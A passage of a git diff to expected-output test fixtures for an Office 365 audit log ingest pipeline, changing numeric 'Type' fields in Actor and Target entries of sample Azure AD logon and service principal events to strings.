"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -18720,27 +18720,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -18821,27 +18821,27 @@ "Target": [ { "ID": "ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855", - "Type": 2 + "Type": "2" }, { "ID": "fb91e9f0-9485-4a68-89e9-a164d20ae855", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "siem2", - "Type": 1 + "Type": "1" }, { "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", - "Type": 2 + "Type": "2" }, { "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -18927,27 +18927,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -19028,27 +19028,27 @@ "Target": [ { "ID": "ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855", - "Type": 2 + "Type": "2" }, { "ID": "fb91e9f0-9485-4a68-89e9-a164d20ae855", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "siem2", - "Type": 1 + "Type": "1" }, { "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", - "Type": 2 + "Type": "2" }, { "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -19134,27 +19134,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -19235,27 +19235,27 @@ "Target": [ { "ID": "ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855", - "Type": 2 + "Type": "2" }, { "ID": "fb91e9f0-9485-4a68-89e9-a164d20ae855", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "siem2", - "Type": 1 + "Type": "1" }, { "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", - "Type": 2 + "Type": "2" }, { "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -19341,27 +19341,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -19435,27 +19435,27 @@ "Target": [ { "ID": "ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855", - "Type": 2 + "Type": "2" }, { "ID": "fb91e9f0-9485-4a68-89e9-a164d20ae855", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "siem2", - "Type": 1 + "Type": "1" }, { "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", - "Type": 2 + "Type": "2" }, { "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -19541,27 +19541,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -19635,27 +19635,27 @@ "Target": [ { "ID": "ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855", - "Type": 2 + "Type": "2" }, { "ID": "fb91e9f0-9485-4a68-89e9-a164d20ae855", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "siem2", - "Type": 1 + "Type": "1" }, { "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", - "Type": 2 + "Type": "2" }, { "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -19741,27 +19741,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -19835,27 +19835,27 @@ "Target": [ { "ID": "ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855", - "Type": 2 + "Type": "2" }, { "ID": "fb91e9f0-9485-4a68-89e9-a164d20ae855", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "siem2", - "Type": 1 + "Type": "1" }, { "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", - "Type": 2 + "Type": "2" }, { "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", diff --git a/packages/o365/data_stream/audit/_dev/test/pipeline/test-azuread-sts-logon-events.json-expected.json b/packages/o365/data_stream/audit/_dev/test/pipeline/test-azuread-sts-logon-events.json-expected.json index 2827cec97ef..ad1a01d1e5f 100644 --- a/packages/o365/data_stream/audit/_dev/test/pipeline/test-azuread-sts-logon-events.json-expected.json +++ b/packages/o365/data_stream/audit/_dev/test/pipeline/test-azuread-sts-logon-events.json-expected.json @@ -39,15 +39,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -70,7 +70,7 @@ "Target": [ { "ID": "00000002-0000-0000-c000-000000000000", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -169,15 +169,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -200,7 +200,7 @@ "Target": [ { "ID": "00000003-0000-0000-c000-000000000000", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -299,15 +299,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -330,7 +330,7 @@ "Target": [ { "ID": "Unknown", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -429,15 +429,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -460,7 +460,7 @@ "Target": [ { "ID": "00000003-0000-0000-c000-000000000000", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -559,15 +559,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -590,7 +590,7 @@ "Target": [ { "ID": "Unknown", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -689,15 +689,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -720,7 +720,7 @@ "Target": [ { "ID": "5f09333a-842c-47da-a157-57da27fcbca5", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -819,15 +819,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -850,7 +850,7 @@ "Target": [ { "ID": "00000003-0000-0000-c000-000000000000", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -949,15 +949,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -980,7 +980,7 @@ "Target": [ { "ID": "Unknown", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -1079,15 +1079,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -1110,7 +1110,7 @@ "Target": [ { "ID": "Unknown", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -1209,15 +1209,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -1240,7 +1240,7 @@ "Target": [ { "ID": "Unknown", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -1339,15 +1339,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -1370,7 +1370,7 @@ "Target": [ { "ID": "00000002-0000-0ff1-ce00-000000000000", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -1469,15 +1469,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -1500,7 +1500,7 @@ "Target": [ { "ID": "00000003-0000-0000-c000-000000000000", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -1599,15 +1599,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -1630,7 +1630,7 @@ "Target": [ { "ID": "00000002-0000-0000-c000-000000000000", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -1729,15 +1729,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -1760,7 +1760,7 @@ "Target": [ { "ID": "00000002-0000-0ff1-ce00-000000000000", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -1859,15 +1859,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -1890,7 +1890,7 @@ "Target": [ { "ID": "00000003-0000-0000-c000-000000000000", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -1989,15 +1989,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -2020,7 +2020,7 @@ "Target": [ { "ID": "00000002-0000-0000-c000-000000000000", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -2119,15 +2119,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -2150,7 +2150,7 @@ "Target": [ { "ID": "Unknown", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -2249,15 +2249,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -2280,7 +2280,7 @@ "Target": [ { "ID": "00000002-0000-0000-c000-000000000000", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -2379,15 +2379,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -2410,7 +2410,7 @@ "Target": [ { "ID": "00000002-0000-0000-c000-000000000000", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -2509,15 +2509,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -2540,7 +2540,7 @@ "Target": [ { "ID": "00000002-0000-0000-c000-000000000000", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -2639,15 +2639,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -2670,7 +2670,7 @@ "Target": [ { "ID": "Unknown", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -2769,15 +2769,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -2800,7 +2800,7 @@ "Target": [ { "ID": "00000003-0000-0ff1-ce00-000000000000", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -2899,15 +2899,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -2930,7 +2930,7 @@ "Target": [ { "ID": "00000002-0000-0000-c000-000000000000", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -3029,15 +3029,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -3060,7 +3060,7 @@ "Target": [ { "ID": "00000002-0000-0000-c000-000000000000", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -3159,15 +3159,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -3190,7 +3190,7 @@ "Target": [ { "ID": "00000003-0000-0ff1-ce00-000000000000", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -3289,15 +3289,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -3320,7 +3320,7 @@ "Target": [ { "ID": "00000002-0000-0000-c000-000000000000", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -3419,15 +3419,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -3450,7 +3450,7 @@ "Target": [ { "ID": "00000003-0000-0000-c000-000000000000", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -3549,15 +3549,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -3580,7 +3580,7 @@ "Target": [ { "ID": "00000003-0000-0000-c000-000000000000", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -3679,15 +3679,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -3710,7 +3710,7 @@ "Target": [ { "ID": "0f698dd4-f011-4d23-a33e-b36416dcb1e6", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -3809,15 +3809,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -3839,7 +3839,7 @@ "Target": [ { "ID": "00000002-0000-0000-c000-000000000000", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -3938,15 +3938,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -3970,7 +3970,7 @@ "Target": [ { "ID": "00000002-0000-0000-c000-000000000000", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -4069,7 +4069,7 @@ "Actor": [ { "ID": "Unknown", - "Type": 0 + "Type": "0" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -4091,7 +4091,7 @@ "Target": [ { "ID": "Unknown", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -4184,15 +4184,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -4215,7 +4215,7 @@ "Target": [ { "ID": "5f09333a-842c-47da-a157-57da27fcbca5", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -4314,7 +4314,7 @@ "Actor": [ { "ID": "Unknown", - "Type": 0 + "Type": "0" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -4336,7 +4336,7 @@ "Target": [ { "ID": "Unknown", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -4429,15 +4429,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -4461,7 +4461,7 @@ "Target": [ { "ID": "797f4846-ba00-4fd7-ba43-dac1f8f63013", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -4560,7 +4560,7 @@ "Actor": [ { "ID": "Unknown", - "Type": 0 + "Type": "0" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -4582,7 +4582,7 @@ "Target": [ { "ID": "Unknown", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -4675,15 +4675,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -4707,7 +4707,7 @@ "Target": [ { "ID": "797f4846-ba00-4fd7-ba43-dac1f8f63013", - "Type": 0 